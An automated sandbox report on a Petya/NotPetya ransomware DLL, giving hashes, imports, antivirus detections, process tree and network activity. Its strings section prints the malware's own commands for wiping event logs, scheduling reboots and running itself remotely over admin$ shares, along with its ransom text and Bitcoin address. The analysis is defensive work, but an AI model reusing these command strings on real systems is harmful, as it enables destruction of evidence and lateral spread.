Analysis Task

Analysis type  VM label  Start time  End time  Duration
File (Windows)  win7-sp1-x64-hpdapp03-1  2017-06-28 14:37:23  2017-06-28 14:42:42  319 seconds
  • Error message: Task #103405: The analysis hit the critical timeout, terminating.
    Please contact support@maldun.com for help!

Maldun Score

10.0

Petya virus

File Details

File name 027cc450ef5f8c5f653329641ec1fed9.exe
File size 362360 bytes
File type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 71b6a493388e7d0b40c83ce903bc6b04
SHA1 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512 072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
CRC32 673F086C
Ssdeep 6144:y/Bt80VmNTBo/x95ZjAetGDN3VFNq7pC+9OqFoK30b3ni5rdQY/CdUOs2:y/X4NTS/x9jNG+w+9OqFoK323qdQYKUG

Hosts contacted

No host records.

DNS resolution

No domain information.


PE Information

Image base 0x10000000
Entry point 0x10007d39
Declared checksum 0x0005bb63
Actual checksum 0x0005bb63
Minimum OS version required 5.1
Compile time 2017-06-18 15:14:36
Import hash 52dd60b5f3c9e2f17c2e303e8c8d4eab

Microsoft Certificate Verification (Sign Tool)

SHA1  Timestamp  Validity  Error
1432e4ad0ed7355e37df2421cd1a8f3bb933923f Wed Apr 28 02:06:59 2010
WinVerifyTrust returned error 0x80096010
Certificate chain: Certificate Chain 1
Issued to Microsoft Root Authority
Issuer Microsoft Root Authority
Valid until Thu Dec 31 15:00:00 2020
SHA1 hash a43489159a520f0d93d032ccaf37e7fe20a8b419
Certificate chain: Certificate Chain 2
Issued to Microsoft Code Signing PCA
Issuer Microsoft Root Authority
Valid until Sat Aug 25 15:00:00 2012
SHA1 hash 3036e3b25b88a55b86fc90e6e9eaad5081445166
Certificate chain: Certificate Chain 3
Issued to Microsoft Corporation
Issuer Microsoft Code Signing PCA
Valid until Tue Mar 08 06:40:29 2011
SHA1 hash 9617094a1cfb59ae7c1f7dfdb6739e4e7c40508f
Certificate chain: Timestamp Chain 1
Issued to Microsoft Root Authority
Issuer Microsoft Root Authority
Valid until Thu Dec 31 15:00:00 2020
SHA1 hash a43489159a520f0d93d032ccaf37e7fe20a8b419
Certificate chain: Timestamp Chain 2
Issued to Microsoft Timestamping PCA
Issuer Microsoft Root Authority
Valid until Sun Sep 15 15:00:00 2019
SHA1 hash 3ea99a60058275e0ed83b892a909449f8c33b245
Certificate chain: Timestamp Chain 3
Issued to Microsoft Time-Stamp Service
Issuer Microsoft Timestamping PCA
Valid until Fri Jul 26 03:11:15 2013
SHA1 hash 4d6f357f0e6434da97b1afc540fb6fdd0e85a89f

PE Sections

Name  Virtual address  Virtual size  Raw data size  Characteristics  Entropy
.text 0x00001000 0x0000bd63 0x0000be00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.55
.rdata 0x0000d000 0x00008546 0x00008600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.99
.data 0x00016000 0x00009b4a 0x00005200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.43
.rsrc 0x00020000 0x0003c738 0x0003c800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00
.reloc 0x0005d000 0x00000c02 0x00000e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.77

Overlay

Offset 0x00057000
Size 0x00001778

Resources

Name  Offset  Size  Language  Sublanguage  Entropy  File type
RT_RCDATA 0x0005ba04 0x00000d33 LANG_ENGLISH SUBLANG_ENGLISH_US 7.95 data

Imports

Library: KERNEL32.dll:
0x1000d09c ConnectNamedPipe
0x1000d0a0 GetModuleHandleW
0x1000d0a4 CreateNamedPipeW
0x1000d0a8 TerminateThread
0x1000d0ac DisconnectNamedPipe
0x1000d0b0 FlushFileBuffers
0x1000d0b4 GetTempPathW
0x1000d0b8 GetProcAddress
0x1000d0bc DeleteFileW
0x1000d0c0 FreeLibrary
0x1000d0c4 GlobalAlloc
0x1000d0c8 LoadLibraryW
0x1000d0cc GetComputerNameExW
0x1000d0d0 GlobalFree
0x1000d0d4 ExitProcess
0x1000d0d8 GetVersionExW
0x1000d0dc GetModuleFileNameW
0x1000d0e4 ResumeThread
0x1000d0ec GetFileSize
0x1000d0f0 SetFilePointer
0x1000d0f4 SetLastError
0x1000d0f8 LoadResource
0x1000d0fc GetCurrentThread
0x1000d100 OpenProcess
0x1000d104 GetSystemDirectoryW
0x1000d108 SizeofResource
0x1000d10c GetLocalTime
0x1000d110 Process32FirstW
0x1000d114 LockResource
0x1000d118 Process32NextW
0x1000d11c GetModuleHandleA
0x1000d120 lstrcatW
0x1000d128 GetCurrentProcess
0x1000d12c VirtualFree
0x1000d130 VirtualAlloc
0x1000d134 LoadLibraryA
0x1000d138 VirtualProtect
0x1000d13c WideCharToMultiByte
0x1000d140 GetExitCodeProcess
0x1000d144 WaitForMultipleObjects
0x1000d148 CreateProcessW
0x1000d14c PeekNamedPipe
0x1000d150 GetTempFileNameW
0x1000d154 InterlockedExchange
0x1000d158 LeaveCriticalSection
0x1000d15c MultiByteToWideChar
0x1000d160 CreateFileA
0x1000d164 GetTickCount
0x1000d168 CreateThread
0x1000d16c LocalFree
0x1000d170 FindNextFileW
0x1000d174 CreateFileMappingW
0x1000d178 LocalAlloc
0x1000d17c FindClose
0x1000d180 GetFileSizeEx
0x1000d184 CreateFileW
0x1000d188 Sleep
0x1000d18c FlushViewOfFile
0x1000d190 GetLogicalDrives
0x1000d194 WaitForSingleObject
0x1000d198 GetDriveTypeW
0x1000d19c UnmapViewOfFile
0x1000d1a0 MapViewOfFile
0x1000d1a4 FindFirstFileW
0x1000d1a8 CloseHandle
0x1000d1ac DeviceIoControl
0x1000d1b0 GetLastError
0x1000d1b4 GetSystemDirectoryA
0x1000d1b8 ReadFile
0x1000d1bc WriteFile
0x1000d1c0 GetProcessHeap
0x1000d1c8 HeapReAlloc
0x1000d1cc GetWindowsDirectoryW
0x1000d1d0 EnterCriticalSection
0x1000d1d4 HeapFree
0x1000d1d8 SetFilePointerEx
0x1000d1dc HeapAlloc
0x1000d1e0 FindResourceW
Library: USER32.dll:
0x1000d250 ExitWindowsEx
0x1000d254 wsprintfA
0x1000d258 wsprintfW
Library: ADVAPI32.dll:
0x1000d000 CryptGenRandom
0x1000d004 CryptAcquireContextA
0x1000d008 CryptExportKey
0x1000d00c CryptAcquireContextW
0x1000d010 CreateProcessAsUserW
0x1000d018 DuplicateTokenEx
0x1000d01c SetTokenInformation
0x1000d020 GetTokenInformation
0x1000d028 OpenThreadToken
0x1000d02c GetSidSubAuthority
0x1000d030 AdjustTokenPrivileges
0x1000d034 LookupPrivilegeValueW
0x1000d038 OpenProcessToken
0x1000d03c SetThreadToken
0x1000d040 CredEnumerateW
0x1000d044 CredFree
0x1000d050 CryptDestroyKey
0x1000d054 CryptGenKey
0x1000d058 CryptEncrypt
0x1000d05c CryptImportKey
0x1000d060 CryptSetKeyParam
0x1000d064 CryptReleaseContext
Library: SHELL32.dll:
0x1000d210 CommandLineToArgvW
0x1000d214 SHGetFolderPathW
Library: ole32.dll:
0x1000d2b8 CoCreateGuid
0x1000d2bc CoTaskMemFree
0x1000d2c0 StringFromCLSID
Library: CRYPT32.dll:
0x1000d06c CryptStringToBinaryW
0x1000d070 CryptBinaryToStringW
0x1000d074 CryptDecodeObjectEx
Library: SHLWAPI.dll:
0x1000d21c PathAppendW
0x1000d220 StrToIntW
0x1000d224 PathFindFileNameW
0x1000d228 PathFileExistsW
0x1000d22c StrCmpW
0x1000d230 StrCmpIW
0x1000d234 StrChrW
0x1000d238 StrCatW
0x1000d23c StrStrW
0x1000d240 PathFindExtensionW
0x1000d244 PathCombineW
0x1000d248 StrStrIW
Library: IPHLPAPI.DLL:
0x1000d090 GetIpNetTable
0x1000d094 GetAdaptersInfo
Library: WS2_32.dll:
0x1000d260 inet_ntoa
0x1000d264 gethostbyname
0x1000d268 __WSAFDIsSet
0x1000d26c ntohl
0x1000d270 ioctlsocket
0x1000d274 connect
0x1000d278 inet_addr
0x1000d27c select
0x1000d280 recv
0x1000d284 send
0x1000d288 htons
0x1000d28c closesocket
0x1000d290 socket
0x1000d294 WSAStartup
Library: MPR.dll:
0x1000d1e8 WNetOpenEnumW
0x1000d1ec WNetEnumResourceW
0x1000d1f0 WNetCancelConnection2W
0x1000d1f4 WNetAddConnection2W
0x1000d1f8 WNetCloseEnum
Library: NETAPI32.dll:
0x1000d200 NetServerEnum
0x1000d204 NetApiBufferFree
0x1000d208 NetServerGetInfo
Library: DHCPSAPI.DLL:
0x1000d07c DhcpEnumSubnetClients
0x1000d080 DhcpRpcFreeMemory
0x1000d084 DhcpGetSubnetInfo
0x1000d088 DhcpEnumSubnets
Library: msvcrt.dll:
0x1000d29c malloc
0x1000d2a0 _itoa
0x1000d2a4 free
0x1000d2a8 memset
0x1000d2ac rand
0x1000d2b0 memcpy

Strings

.text
`.rdata
@.data
.rsrc
@.reloc
PVVhH
QSVWh
L$@Qj
VV@PVVh
PVVVVh
D$<PSSh
Fast decoding Code from Chris Anderson
invalid literal/length code
invalid distance code
invalid distance too far back
1.2.8
incorrect header check
unknown compression method
invalid window size
unknown header flags set
header crc mismatch
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid code lengths set
invalid bit length repeat
invalid code -- missing end-of-block
invalid literal/lengths set
invalid distances set
invalid literal/length code
invalid distance code
invalid distance too far back
incorrect data check
incorrect length check
need dictionary
stream end
file error
stream error
data error
insufficient memory
buffer error
incompatible version
inflate 1.2.8 Copyright 1995-2013 Mark Adler
\\.\PhysicalDrive
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
IsWow64Process
GetExtendedTcpTable
ntdll.dll
NtRaiseHardError
\\.\C:
\\.\PhysicalDrive0
255.255.255.255
%u.%u.%u.%u
CreateFileA
HeapAlloc
SetFilePointerEx
HeapFree
GetProcessHeap
WriteFile
ReadFile
GetSystemDirectoryA
GetLastError
DeviceIoControl
CloseHandle
FindFirstFileW
MapViewOfFile
UnmapViewOfFile
GetDriveTypeW
WaitForSingleObject
GetLogicalDrives
FlushViewOfFile
Sleep
CreateFileW
GetFileSizeEx
FindClose
LocalAlloc
CreateFileMappingW
FindNextFileW
LocalFree
CreateThread
GetTickCount
MultiByteToWideChar
LeaveCriticalSection
SetLastError
EnterCriticalSection
HeapReAlloc
InitializeCriticalSection
InterlockedExchange
GetTempFileNameW
PeekNamedPipe
CreateProcessW
GetCurrentProcess
ConnectNamedPipe
GetModuleHandleW
CreateNamedPipeW
TerminateThread
DisconnectNamedPipe
FlushFileBuffers
GetTempPathW
GetProcAddress
DeleteFileW
FreeLibrary
GlobalAlloc
LoadLibraryW
GetComputerNameExW
GlobalFree
ExitProcess
GetVersionExW
GetModuleFileNameW
DisableThreadLibraryCalls
ResumeThread
GetEnvironmentVariableW
GetFileSize
SetFilePointer
FindResourceW
LoadResource
GetCurrentThread
OpenProcess
GetSystemDirectoryW
SizeofResource
GetLocalTime
Process32FirstW
LockResource
Process32NextW
GetModuleHandleA
lstrcatW
CreateToolhelp32Snapshot
GetWindowsDirectoryW
VirtualFree
VirtualAlloc
LoadLibraryA
VirtualProtect
WideCharToMultiByte
GetExitCodeProcess
WaitForMultipleObjects
KERNEL32.dll
wsprintfW
ExitWindowsEx
wsprintfA
USER32.dll
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
CryptExportKey
CryptAcquireContextW
CryptSetKeyParam
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
CredFree
CredEnumerateW
SetThreadToken
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
GetSidSubAuthority
OpenThreadToken
GetSidSubAuthorityCount
GetTokenInformation
SetTokenInformation
DuplicateTokenEx
InitiateSystemShutdownExW
CreateProcessAsUserW
ADVAPI32.dll
CommandLineToArgvW
SHGetFolderPathW
SHELL32.dll
StringFromCLSID
CoCreateGuid
CoTaskMemFree
ole32.dll
CryptDecodeObjectEx
CryptStringToBinaryW
CryptBinaryToStringW
CRYPT32.dll
PathFindExtensionW
StrStrIW
PathCombineW
StrStrW
StrCatW
StrChrW
StrToIntW
StrCmpIW
StrCmpW
PathFileExistsW
PathFindFileNameW
PathAppendW
SHLWAPI.dll
GetIpNetTable
GetAdaptersInfo
IPHLPAPI.DLL
WS2_32.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
WNetCancelConnection2W
WNetAddConnection2W
MPR.dll
NetServerEnum
NetApiBufferFree
NetServerGetInfo
NETAPI32.dll
DhcpRpcFreeMemory
DhcpGetSubnetInfo
DhcpEnumSubnets
DhcpEnumSubnetClients
DHCPSAPI.DLL
msvcrt.dll
memcpy
malloc
_itoa
memset
perfc.dat
bHbGcDiHpY`
.text
`.rdata
@.data
@.rsrc
@.reloc
QSVh<
FindResourceW
LoadResource
CreateProcessW
HeapAlloc
HeapFree
GetProcessHeap
WriteFile
SizeofResource
CreateFileW
LockResource
CloseHandle
KERNEL32.dll
IsProcessorFeaturePresent
.text
`.rdata
@.data
.pdata
@.rsrc
CreateProcessW
CloseHandle
WriteFile
CreateFileW
HeapFree
HeapAlloc
GetProcessHeap
SizeofResource
LockResource
LoadResource
FindResourceW
KERNEL32.dll
rp>?C\@*BB@rp>3<?3<@\Crp<&R>?RB\C@r
sSsAsCsCsCsSsFs]sCsss
u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu
5mE'%%%
0123456789abcdef
CHKDSK is repairing sector
Please reboot your computer!
Decrypting sector
Key:
%)
4=@w|
2S1]-'e
^c_B~
hn vF
Vzs.i
%<PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
9"</<|</>
;4<8<<<@<D<H<L<
zw9gj
Send your Bitcoin wallet ID and personal installation key to e-mail
MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB
C:\Windows;
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
Microsoft Enhanced RSA and AES Cryptographic Provider
README.TXT
"%ws:%ws"
kernel32.dll
\\.\pipe\%ws
"%ws" %ws
iphlpapi.dll
e%u.%u.%u.%u
TERMSRV/
127.0.0.1
localhost
SeTcbPrivilege
SeShutdownPrivilege
SeDebugPrivilege
C:\Windows\
/c %ws
ComSpec
\cmd.exe
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
at %02d:%02d %ws
shutdown.exe /r /f
/RU "SYSTEM"
dllhost.dat
u%s \\%s -accepteula -s
-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
wbem\wmic.exe
%s /node:"%ws" /user:"%ws" /password:"%ws"
process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
\\%s\admin$
\\%ws\admin$\%ws
c:\Windows\
rundll32.exe
rundll32.exe
c:\Windows\
Antivirus engine/vendor  Detection name/rule matched  Signature database date
Bkav W32.RsPetyaND.Worm 20170628
MicroWorld-eScan Trojan.Ransom.GoldenEye.B 20170628
nProtect Ransom/W32.Petya.362360 20170628
CMC RansomWare.Win32.Petya!O 20170628
CAT-QuickHeal Ransom.Petya 20170627
McAfee RDN/Ransomware 20170628
Malwarebytes Ransom.Petya.EB 20170628
VIPRE Win32.Malware!Drop 20170628
SUPERAntiSpyware No virus found 20170628
TheHacker No virus found 20170628
K7GW Trojan ( 0001140e1 ) 20170628
K7AntiVirus Trojan ( 0001140e1 ) 20170627
Arcabit Trojan.Ransom.GoldenEye.B 20170628
Invincea No virus found 20170607
Baidu No virus found 20170628
Cyren W32/Petya.VUNZ-1981 20170628
Symantec Ransom.Petya 20170628
ESET-NOD32 Win32/Diskcoder.C 20170628
TrendMicro-HouseCall Ransom_PETYA.TH627 20170628
Paloalto generic.ml 20170628
ClamAV No virus found 20170628
GData Win32.Trojan-Ransom.Petya.V 20170628
Kaspersky Trojan-Ransom.Win32.PetrWrap.d 20170627
BitDefender Trojan.Ransom.GoldenEye.B 20170628
NANO-Antivirus Trojan.Win32.Petya.eqlcgp 20170628
AegisLab No virus found 20170628
Rising No virus found 20170625
Ad-Aware Trojan.Ransom.GoldenEye.B 20170628
Emsisoft Trojan-Ransom.GoldenEye (A) 20170628
Comodo TrojWare.Win32.Ransom.Petya.BE 20170628
F-Secure Trojan:W32/Petya.F 20170628
DrWeb Trojan.Encoder.12544 20170628
Zillya No virus found 20170623
TrendMicro Ransom_PETYA.TH627 20170628
McAfee-GW-Edition Ransom-Petya!71B6A493388E 20170628
Sophos Troj/Ransom-EOB 20170628
Ikarus Trojan-Ransom.Petrwrap 20170627
F-Prot W32/Petya.Ransom.J 20170628
Jiangmin Trojan.RansomPetya.a 20170628
Webroot W32.Ransomware.Petrwrap 20170628
Avira TR/Ransom.ME.12 20170628
Antiy-AVL Trojan[Ransom]/Win32.Petya 20170628
Kingsoft No virus found 20170628
Endgame malicious (high confidence) 20170615
ViRobot Trojan.Win32.S.Petya.362360 20170628
ZoneAlarm Trojan-Ransom.Win32.PetrWrap.d 20170628
Microsoft Ransom:Win32/Petya 20170628
AhnLab-V3 No virus found 20170627
ALYac Trojan.Ransom.Petya 20170628
AVware Win32.Malware!Drop 20170628
VBA32 TrojanRansom.Filecoder 20170627
Panda Trj/CryptoPetya.B 20170626
Zoner No virus found 20170628
Tencent Win32.Trojan.Ransomware.Skuo 20170628
Yandex No virus found 20170627
SentinelOne No virus found 20170516
Fortinet W32/Petya.EOB!tr 20170628
AVG Win64:Malware-gen 20170628
Avast Win64:Malware-gen 20170628
CrowdStrike malicious_confidence_100% (W) 20170420
Qihoo-360 Trojan.Generic 20170628

Process Tree

rundll32.exe, PID: 2568, parent PID: 2428
cmd.exe, PID: 2664, parent PID: 2568
736A.tmp, PID: 2760, parent PID: 2568
schtasks.exe, PID: 2804, parent PID: 2664
cmd.exe, PID: 2988, parent PID: 2568
wevtutil.exe, PID: 3060, parent PID: 2988
wevtutil.exe, PID: 1440, parent PID: 2988
wevtutil.exe, PID: 1092, parent PID: 2988
wevtutil.exe, PID: 696, parent PID: 2988
fsutil.exe, PID: 1256, parent PID: 2988

TCP

Source address  Source port  Destination address  Destination port
192.168.122.201 49189 192.168.122.1 80

UDP

No UDP connection records.

HTTP Requests

URI  HTTP data
http://192.168.122.1/
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: DavClnt
translate: f
Host: 192.168.122.1

SMTP Traffic

No SMTP traffic.

IRC Traffic

No IRC requests.

ICMP Traffic

Source address  Destination address  ICMP type  Data
192.168.122.1 192.168.122.201 3
192.168.122.1 192.168.122.201 3
192.168.122.1 192.168.122.201 3

CIF Report

No CIF results

Network Alerts

No alerts

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No network-extracted files found.

Dropped Files

File name 027cc450ef5f8c5f653329641ec1fed9.exe.dll
Related file C:\Users\test\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.exe.dll
File size 362360 bytes
File type data
MD5 9a7ffe65e0912f9379ba6e8e0b079fde
SHA1 532bea84179e2336caed26e31805ceaa7eec53dd
SHA256 4b336c3cc9b6c691fe581077e3dd9ea7df3bf48f79e35b05cf87e079ec8e0651
CRC32 1CC8A763
Ssdeep 3::
Yara
  • Rule to detect the no presence of any image
  • Rule to detect the no presence of any attachment
  • Rule to detect the no presence of any url

File name 736A.tmp
Related file C:\Users\test\AppData\Local\Temp\736A.tmp
File size 56320 bytes
File type data
MD5 bfd70118226e2e6391b6a0992f8b5b22
SHA1 4f9e3810d346b368b7c2437eb4bb040d3f6daed3
SHA256 f8d214080544676394eea8dda1cbd79db436414860e1809cccd56b2da039c724
CRC32 41ACE994
Ssdeep 3::

No similar analyses found.

Processing ( 15.749 seconds )

  • 7.16 Suricata
  • 3.768 BehaviorAnalysis
  • 1.638 VirusTotal
  • 1.247 Dropped
  • 0.95 TargetInfo
  • 0.553 Static
  • 0.274 peid
  • 0.056 AnalysisInfo
  • 0.038 Debug
  • 0.035 NetworkAnalysis
  • 0.028 Strings
  • 0.002 Memory

Signatures ( 2.789 seconds )

  • 0.334 antiav_detectfile
  • 0.247 infostealer_bitcoin
  • 0.197 md_bad_drop
  • 0.184 ransomware_extensions
  • 0.158 mimics_filetime
  • 0.145 antivm_generic_disk
  • 0.145 stealth_timeout
  • 0.13 antivm_vbox_files
  • 0.122 infostealer_ftp
  • 0.111 virus
  • 0.11 ransomware_files
  • 0.108 stealth_file
  • 0.093 reads_self
  • 0.086 infostealer_im
  • 0.061 antidbg_devices
  • 0.052 infostealer_mail
  • 0.045 rat_pcclient
  • 0.04 hawkeye_behavior
  • 0.035 network_tor
  • 0.028 injection_createremotethread
  • 0.027 injection_explorer
  • 0.025 antivm_vmware_files
  • 0.021 betabot_behavior
  • 0.02 kazybot_behavior
  • 0.02 injection_runpe
  • 0.02 network_tor_service
  • 0.019 sniffer_winpcap
  • 0.018 antiav_detectreg
  • 0.016 kibex_behavior
  • 0.016 geodo_banking_trojan
  • 0.014 persistence_autorun
  • 0.013 targeted_flame
  • 0.012 antivm_vpc_files
  • 0.012 banker_cridex
  • 0.009 antianalysis_detectfile
  • 0.008 tinba_behavior
  • 0.008 antisandbox_sunbelt_files
  • 0.007 antiemu_wine_func
  • 0.007 shifu_behavior
  • 0.006 bitcoin_opencl
  • 0.006 spreading_autoruninf
  • 0.005 antivm_vbox_devices
  • 0.005 modifies_hostfile
  • 0.004 network_http
  • 0.004 persistence_ads
  • 0.003 antiav_avast_libs
  • 0.003 antianalysis_detectreg
  • 0.003 antisandbox_joe_anubis_files
  • 0.003 disables_browser_warn
  • 0.002 antivm_vbox_libs
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antivm_vmware_devices
  • 0.002 browser_security
  • 0.001 bootkit
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 exec_crash
  • 0.001 vawtrak_behavior
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 modify_proxy
  • 0.001 disables_system_restore
  • 0.001 md_url_bl
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 network_cnc_http
  • 0.001 office_security

Reporting ( 1.02 seconds )

  • 0.536 ReportHTMLSummary
  • 0.484 Malheur
Task ID 103405
Mongo ID 59535002a093ef3c3f82289c
Cuckoo release 1.4-Maldun